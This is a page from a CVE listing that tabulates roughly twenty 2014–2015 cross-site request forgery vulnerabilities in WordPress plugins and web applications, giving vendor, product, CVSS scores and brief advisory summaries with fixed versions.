Total
7283 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2015-20105 | 1 Cbads | 1 Clickbank Affiliate Ads | 2024-11-21 | 6.8 MEDIUM | 9.6 CRITICAL |
| The ClickBank Affiliate Ads WordPress plugin through 1.20 does not have CSRF check when saving its settings, allowing attacker to make logged in admin change them via a CSRF attack. Furthermore, due to the lack of escaping when they are outputting, it could also lead to Stored Cross-Site Scripting issues | |||||
| CVE-2015-1785 | 1 Imagely | 1 Nextgen Gallery | 2024-11-21 | 4.3 MEDIUM | 6.5 MEDIUM |
| In nextgen-galery wordpress plugin before 2.0.77.3 there are two vulnerabilities which can allow an attacker to gain full access over the web application. The vulnerabilities lie in how the application validates user uploaded files and lack of security measures preventing unwanted HTTP requests. | |||||
| CVE-2015-1583 | 1 Atutor | 1 Atutor | 2024-11-21 | 6.8 MEDIUM | 8.8 HIGH |
| Multiple cross-site request forgery (CSRF) vulnerabilities in ATutor 2.2 allow remote attackers to hijack the authentication of administrators for requests that (1) create an administrator account via a request to mods/_core/users/admins/create.php or (2) create a user account via a request to mods/_core/users/create_user.php. | |||||
| CVE-2015-1391 | 1 Hp | 1 Airwave | 2024-11-21 | N/A | 8.8 HIGH |
| Aruba AirWave before 8.0.7 allows bypass of a CSRF protection mechanism. | |||||
| CVE-2015-10125 | 1 Smackcoders | 1 Import All Pages\, Post Types\, Products\, Orders\, And Users As Xml \& Csv | 2024-11-21 | 5.0 MEDIUM | 4.3 MEDIUM |
| A vulnerability classified as problematic has been found in WP Ultimate CSV Importer Plugin 3.7.2 on WordPress. This affects an unknown part. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. Upgrading to version 3.7.3 is able to address this issue. The identifier of the patch is 13c30af721d3f989caac72dd0f56cf0dc40fad7e. It is recommended to upgrade the affected component. The identifier VDB-241317 was assigned to this vulnerability. | |||||
| CVE-2015-10116 | 1 Realfavicongenerator | 1 Favicon By Realfavicongenerator | 2024-11-21 | 5.0 MEDIUM | 4.3 MEDIUM |
| A vulnerability classified as problematic has been found in RealFaviconGenerator Favicon Plugin up to 1.2.12 on WordPress. This affects the function install_new_favicon of the file admin/class-favicon-by-realfavicongenerator-admin.php. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. Upgrading to version 1.2.13 is able to address this issue. The identifier of the patch is 949a1ae7216216350458844f50a72f100b56d4e7. It is recommended to upgrade the affected component. The identifier VDB-230661 was assigned to this vulnerability. | |||||
| CVE-2015-10109 | 1 Cincopa | 1 Video And Media Plug-in | 2024-11-21 | 5.0 MEDIUM | 4.3 MEDIUM |
| A vulnerability was found in Video Playlist and Gallery Plugin up to 1.136 on WordPress. It has been rated as problematic. Affected by this issue is some unknown functionality of the file wp-media-cincopa.php. The manipulation leads to cross-site request forgery. The attack may be launched remotely. Upgrading to version 1.137 is able to address this issue. The name of the patch is ee28e91f4d5404905204c43b7b84a8ffecad932e. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-230264. | |||||
| CVE-2015-10108 | 1 Inline Google Spreadsheet Viewer Project | 1 Inline Google Spreadsheet Viewer | 2024-11-21 | 5.0 MEDIUM | 4.3 MEDIUM |
| A vulnerability was found in meitar Inline Google Spreadsheet Viewer Plugin up to 0.9.6 on WordPress and classified as problematic. Affected by this issue is the function displayShortcode of the file inline-gdocs-viewer.php. The manipulation leads to cross-site request forgery. The attack may be launched remotely. Upgrading to version 0.9.6.1 is able to address this issue. The patch is identified as 2a8057df8ca30adc859cecbe5cad21ac28c5b747. It is recommended to upgrade the affected component. VDB-230234 is the identifier assigned to this vulnerability. | |||||
| CVE-2015-10081 | 1 Submitbymailplugin Project | 1 Submitbymailplugin | 2024-11-21 | 5.0 MEDIUM | 4.3 MEDIUM |
| A vulnerability was found in arnoldle submitByMailPlugin 1.0b2.9 and classified as problematic. This issue affects some unknown processing of the file edit_list.php. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. Upgrading to version 1.0b2.9a is able to address this issue. The patch is named a739f680a1623d22f52ff1371e86ca472e63756f. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-221495. | |||||
| CVE-2015-10001 | 1 Wp-stats Project | 1 Wp-stats | 2024-11-21 | 4.3 MEDIUM | 4.3 MEDIUM |
| The WP-Stats WordPress plugin before 2.52 does not have CSRF check when saving its settings, and did not escape some of them when outputting them, allowing attacker to make logged in high privilege users change them and set Cross-Site Scripting payloads | |||||
| CVE-2015-0151 | 1 Dlink | 2 Dir-815, Dir-815 Firmware | 2024-11-21 | 6.8 MEDIUM | 8.8 HIGH |
| Cross-site request forgery (CSRF) vulnerability in D-Link DIR-815 devices with firmware before 2.07.B01 allows remote attackers to hijack the authentication of arbitrary users for requests that insert XSS sequences. | |||||
| CVE-2014-9502 | 1 Open Atrium Project | 1 Open Atrium | 2024-11-21 | 6.8 MEDIUM | 8.8 HIGH |
| Multiple cross-site request forgery (CSRF) vulnerabilities in unspecified sub modules in the Open Atrium module 7.x-2.x before 7.x-2.26 for Drupal allow remote attackers to hijack the authentication of unknown victims via vectors related to menu callbacks. | |||||
| CVE-2014-9382 | 1 Free | 1 Freebox Os | 2024-11-21 | 4.3 MEDIUM | 6.5 MEDIUM |
| Freebox OS Web interface 3.0.2 has CSRF which can allow VPN user account creation | |||||
| CVE-2014-8942 | 1 Piwigo | 1 Lexiglot | 2024-11-21 | 6.8 MEDIUM | 8.8 HIGH |
| Lexiglot through 2014-11-20 allows CSRF. | |||||
| CVE-2014-7198 | 1 Openmicroscopy | 1 Omero | 2024-11-21 | 6.8 MEDIUM | 8.8 HIGH |
| OMERO before 5.0.6 has multiple CSRF vulnerabilities because the framework for OMERO's web interface lacks CSRF protection. | |||||
| CVE-2014-6046 | 1 Phpmyfaq | 1 Phpmyfaq | 2024-11-21 | 6.8 MEDIUM | 8.8 HIGH |
| Multiple cross-site request forgery (CSRF) vulnerabilities in phpMyFAQ before 2.8.13 allow remote attackers to hijack the authentication of unspecified users for requests that (1) delete active users by leveraging improper validation of CSRF tokens or that (2) delete open questions, (3) activate users, (4) publish FAQs, (5) add or delete Glossary, (6) add or delete FAQ news, or (7) add or delete comments or add votes by leveraging lack of a CSRF token. | |||||
| CVE-2014-5516 | 1 Konakart | 1 Konakart | 2024-11-21 | 4.3 MEDIUM | 6.5 MEDIUM |
| Cross-site request forgery (CSRF) vulnerability in the Storefront Application in DS Data Systems KonaKart before 7.3.0.0 allows remote attackers to hijack the authentication of administrators for requests that change a user email address via an unspecified GET request. | |||||
| CVE-2014-5288 | 1 Kemptechnologies | 1 Load Master | 2024-11-21 | 6.8 MEDIUM | 8.8 HIGH |
| A CSRF Vulnerability exists in Kemp Load Master before 7.0-18a via unspecified vectors in administrative pages. | |||||
| CVE-2014-5280 | 1 Boot2docker | 1 Boot2docker | 2024-11-21 | 9.3 HIGH | 8.8 HIGH |
| boot2docker 1.2 and earlier allows attackers to conduct cross-site request forgery (CSRF) attacks by leveraging Docker daemons enabling TCP connections without TLS authentication. | |||||
| CVE-2014-5072 | 1 Wpsecurityauditlog | 1 Wp Security Audit Log | 2024-11-21 | 6.8 MEDIUM | 8.8 HIGH |
| Cross-site request forgery (CSRF) vulnerability in WP Security Audit Log plugin before 1.2.5 for WordPress allows remote attackers to hijack the authentication of unspecified victims via unknown vectors. | |||||